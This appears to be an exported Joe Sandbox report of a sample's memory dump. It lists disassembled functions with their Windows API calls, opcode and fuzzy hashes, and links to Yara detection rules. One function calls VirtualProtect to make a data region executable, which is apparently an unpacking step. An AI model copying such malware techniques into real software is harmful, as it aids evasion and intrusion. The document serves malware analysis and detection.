Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
String ID:
API String ID: 3956949563-0
Opcode ID: 534cd56b41b84b9f120122da7a3a161a3ab9a491e86bcf92fb4ec77416d8ab41
Instruction ID: 21f6ab71bc390e9e79b55621aec28f13bb11feb7d013e01e658ebc81233469c1
Opcode Fuzzy Hash: 534cd56b41b84b9f120122da7a3a161a3ab9a491e86bcf92fb4ec77416d8ab41
Instruction Fuzzy Hash: EC2185F2D402199BDF10AF949C06B9E7AF4EF14710F0841A5F51C76281E7B5A944CBA6

Function 00B8CF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,6126FD41,?,00B8D01A,?,?,00000000), ref: 00B8CFCC

Strings

api-ms-, xrefs: 00B8CF62
ext-ms-, xrefs: 00B8CF76

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: c444bb7170e3d4b59939a3234289eba96a2ea2ec47294e56b662afb893c336dd
Instruction ID: 202af5130d1cd8e9d1cdb10c580cc2628be883ee19421bd480fb9c813231f91f
Opcode Fuzzy Hash: c444bb7170e3d4b59939a3234289eba96a2ea2ec47294e56b662afb893c336dd
Instruction Fuzzy Hash: FB21EEB1601311ABD731A765DC41A5A7BD5DF52770F1501A1FA55A72A0DB30ED08C7E0

Function 00B71750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 00B71783

Strings

ios_base::badbit set, xrefs: 00B71BFA, 00B71C20
ios_base::eofbit set, xrefs: 00B71BEA
ios_base::failbit set, xrefs: 00B71BEF

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: _strlen
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 4218353326-1866435925
Opcode ID: 81166c4b1a2b9f8c1e37b84275bb918bbb267eddb5d7a7a5d09d3b30718f1fdc
Instruction ID: abd2577412d62608b4c263d589e4067eb511b08a6b12e98aaa5be7ff7c9368d3
Opcode Fuzzy Hash: 81166c4b1a2b9f8c1e37b84275bb918bbb267eddb5d7a7a5d09d3b30718f1fdc
Instruction Fuzzy Hash: 8DF14F75A006148FCB14CF6CC494BADB7F1FF89324F1986A9E829AB391D734AD45CB90

Function 00B85349 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_00015470,00000000,00000000,00000000), ref: 00B85392
GetLastError.KERNEL32(?,?,?,00B72513,00000000,00000000), ref: 00B8539E
__dosmaperr.LIBCMT ref: 00B853A5

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 8672c3052a332be9b50cd11c88a6381aad55865be80638d42c3631d0dbdd0665
Instruction ID: 0313b5ff40d6c9985426427008dd7575ffa9ffa4dbf2e07e837f327f3c8a151e
Opcode Fuzzy Hash: 8672c3052a332be9b50cd11c88a6381aad55865be80638d42c3631d0dbdd0665
Instruction Fuzzy Hash: 55014C72505619EBDF25AFA4DC06AAE3BE9FF003A5F144098F802961A0EBB0DE50DB54

Function 00B854EE Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B8C2BB: GetLastError.KERNEL32(00000000,?,00B876E9,00B8D306,?,?,00B8C1B7,00000001,00000364,?,00000005,000000FF,?,00B85495,00BA8E38,0000000C), ref: 00B8C2BF
Part of subcall function 00B8C2BB: SetLastError.KERNEL32(00000000), ref: 00B8C361

CloseHandle.KERNEL32(?,?,?,00B853D9,?,?,00B854CE,00000000), ref: 00B8551F
FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00B853D9,?,?,00B854CE,00000000), ref: 00B85535
ExitThread.KERNEL32 ref: 00B8553E

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: 98d52ccd629e9ae238d6f95ce804b0f2832567c6c92ebf849226fb89ebf0b030
Instruction ID: 305bed239d5177c4518bc059ba5fd13686cd82ad098b6b93f28a4e264a7d6ca4
Opcode Fuzzy Hash: 98d52ccd629e9ae238d6f95ce804b0f2832567c6c92ebf849226fb89ebf0b030
Instruction Fuzzy Hash: 8BF0D4B1500A056BCB357B659849B9A3BEAEF12371B184694F869871B0EB30E952C7A0

Function 00B8565F Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000002,?,00B85721,00B88396,00B88396,?,00000002,6126FD41,00B88396,00000002), ref: 00B85670
TerminateProcess.KERNEL32(00000000,?,00B85721,00B88396,00B88396,?,00000002,6126FD41,00B88396,00000002), ref: 00B85677
ExitProcess.KERNEL32 ref: 00B85689

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 52258644f31b8cc7e6d45cc065a059af49707be3d8ed2f67f6142d9b22656bc7
Instruction ID: 3ced62f84cd7f9f358146dbde7253ec2c0d3070480c7179c064b45ca61a21ca4
Opcode Fuzzy Hash: 52258644f31b8cc7e6d45cc065a059af49707be3d8ed2f67f6142d9b22656bc7
Instruction Fuzzy Hash: B8D09271000608BBCF213F61DC0E9993F6AEF51391B8880A0B9594A072EF329992DB84

Function 00B93BF4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B93F9E: GetConsoleOutputCP.KERNEL32(6126FD41,00000000,00000000,?), ref: 00B94001

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00B88584,?), ref: 00B93D79
GetLastError.KERNEL32(?,?,00B88584,?,00B887C8,00000000,?,00000000,00B887C8,?,?,?,00BA8FE8,0000002C,00B886B4,?), ref: 00B93D83

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: c7701455fd4bc06fc297650c32a3717e41f7e13127db3b4879b3d6c0c4ffacf4
Instruction ID: a5abe599b8a5548dbc5b32e215a32d975b7301983fcfa10e54ba4ef52e571c00
Opcode Fuzzy Hash: c7701455fd4bc06fc297650c32a3717e41f7e13127db3b4879b3d6c0c4ffacf4
Instruction Fuzzy Hash: A06180B5904259AFDF11DFA8C885AAEBFF9EF09704F1401E5E900A7252D732DA01CBA0

Function 00B943CD Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00B93D5F,00000000,00B887C8,?,00000000,?,00000000), ref: 00B94469
GetLastError.KERNEL32(?,00B93D5F,00000000,00B887C8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00B88584), ref: 00B9448F

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 31564a618b10a3e8ab56d57f038377881c71a68484711dc502005575e673a27c
Instruction ID: 9fa2fde016c422a9bf17a9a257fe3fdf73486be4693aef2a7aff3afcb859afa3
Opcode Fuzzy Hash: 31564a618b10a3e8ab56d57f038377881c71a68484711dc502005575e673a27c
Instruction Fuzzy Hash: 2A216835A002199BCF19CF69D880AE9B7E9EB49305F2444E9EA06D7311DB30AE428B60

Function 00B790F0 Relevance: 3.1, APIs: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00B791C9
std::_Throw_Cpp_error.LIBCPMT ref: 00B791D7

Part of subcall function 00B7EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00B78E4A,00B7A2F0), ref: 00B7EFE7

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
String ID:
API String ID: 3666349979-0
Opcode ID: c143408f0e1a2e35de77b20feb99a117c2557411bfd3087899a2a9cf2c218bde
Instruction ID: 2aae6eb504a62524d3f856238deab97bd36187fc376784c3e0175b326ba5322b
Opcode Fuzzy Hash: c143408f0e1a2e35de77b20feb99a117c2557411bfd3087899a2a9cf2c218bde
Instruction Fuzzy Hash: 5221EFB1A006469BDB10EF648D45BAEBBF5FF09320F148268E5396B7C1D734A914CBD2

Function 00B8DA52 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00B8D941,00BA9330,0000000C), ref: 00B8DA9E
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00B8D941,00BA9330,0000000C), ref: 00B8DAB0

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 34aeee4aca8e00897c66b543cf90d87868bc8ff0dea8f09b22b75d893733ea2f
Instruction ID: 3a3ebd6016f97b9fc668b86dc1726f7a9c0fd8f05c38e100027309b317d5b99e
Opcode Fuzzy Hash: 34aeee4aca8e00897c66b543cf90d87868bc8ff0dea8f09b22b75d893733ea2f
Instruction Fuzzy Hash: 1311B4711087424AC738AA3E8CC86227FD5EB56330B38079BD2B6D75F1CA70D986D300

Function 00B71EF0 Relevance: 3.1, APIs: 2, Instructions: 60
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B71240: _strlen.LIBCMT ref: 00B712BA

FreeConsole.KERNELBASE(?,?,?,?,?,00B7173F,?,?,?,00000000,?), ref: 00B71F21
VirtualProtect.KERNELBASE(00BAA011,00000549,00000040,?), ref: 00B71F78

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ConsoleFreeProtectVirtual_strlen
String ID:
API String ID: 1248733679-0
Opcode ID: 33702e542e5fbae5d989c07af972a04f2c4070e8be6635cbe5c8043361473c42
Instruction ID: 616aabdd0d185c89ed0e42d4967690e09bc0cae0886525a529fd00a56890297b
Opcode Fuzzy Hash: 33702e542e5fbae5d989c07af972a04f2c4070e8be6635cbe5c8043361473c42
Instruction Fuzzy Hash: 7111A771A001086BDB14AB689C07EBE7BF4EB45701F0484A5F918B7292EA75595087E1

Function 00B85470 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00BA8E38,0000000C), ref: 00B85483
ExitThread.KERNEL32 ref: 00B8548A

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 4fcd1b68887271c08e7b53a91c0c45526113fdac3ce5608b87bd07356e95c9aa
Instruction ID: f60af27343735a28d0531b15e722a344bc4d590c2d9c7b9ae57e3f6fa4de2984
Opcode Fuzzy Hash: 4fcd1b68887271c08e7b53a91c0c45526113fdac3ce5608b87bd07356e95c9aa
Instruction Fuzzy Hash: D1F0AFB1A00605AFDB10BFB0C84AA6E3BB0EF05711F148099F016972B2DF746D41CB61

Function 00B72270 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00B72288
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B7229C

Part of subcall function 00B71FB0: CreateFileA.KERNELBASE ref: 00B72036
Part of subcall function 00B71FB0: GetFileSize.KERNEL32(00000000,00000000), ref: 00B72046
Part of subcall function 00B71FB0: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00B7206B
Part of subcall function 00B71FB0: CloseHandle.KERNELBASE(00000000), ref: 00B7207A
Part of subcall function 00B71FB0: _strlen.LIBCMT ref: 00B720CD

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: File$HandleModule$CloseCreateNameReadSize_strlen
String ID:
API String ID: 3505371420-0
Opcode ID: 9f8853d20c53d2d0488e7f52026d9cff7e67823bb96106168fab06d5aacc548f
Instruction ID: 5b7ff15fca3d50fe1ca82ff0663edf44f80f33aef98b9b4f96f6f457b9b74bd6
Opcode Fuzzy Hash: 9f8853d20c53d2d0488e7f52026d9cff7e67823bb96106168fab06d5aacc548f
Instruction Fuzzy Hash: ECF0EDF1A002106BD2217728AC4BEAF7BACDF9A720F044918F5894B282EE741645C7A3

Function 00B8BED7 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00B902B4,?,00000000,?,?,00B8FF54,?,00000007,?,?,00B9089A,?,?), ref: 00B8BEED
GetLastError.KERNEL32(?,?,00B902B4,?,00000000,?,?,00B8FF54,?,00000007,?,?,00B9089A,?,?), ref: 00B8BEF8

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 755a32e2c12003ea3fda6848b074875f13b80c072251f4c93b90646d91a6e205
Instruction ID: d24b79b60d51e39ed4287d968d0a107df1e214c5f514f283158b5cdf592478fb
Opcode Fuzzy Hash: 755a32e2c12003ea3fda6848b074875f13b80c072251f4c93b90646d91a6e205
Instruction Fuzzy Hash: 50E08C72208214ABCF113FB4AC0AB993BA8EB01395F2440B1F60997270DF308C40CB94

Function 00B8C16A Relevance: 2.6, APIs: 2, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B85495,00BA8E38,0000000C), ref: 00B8C16E
SetLastError.KERNEL32(00000000), ref: 00B8C210

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 9ccc5dbeb25fccc0ea4dcf90644d33d13cc73b8ebbce1e59dd6f11a293506a0c
Instruction ID: ff3065d459d19d011baef20dd861729becb78332df9938063a2d5f53e2f4fd6a
Opcode Fuzzy Hash: 9ccc5dbeb25fccc0ea4dcf90644d33d13cc73b8ebbce1e59dd6f11a293506a0c
Instruction Fuzzy Hash: 351151A1285A196BE6103BF4ACCBE672ED8EB427A5B1405A5F625A61B3DF708C04D370

Function 00B7DEF0 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
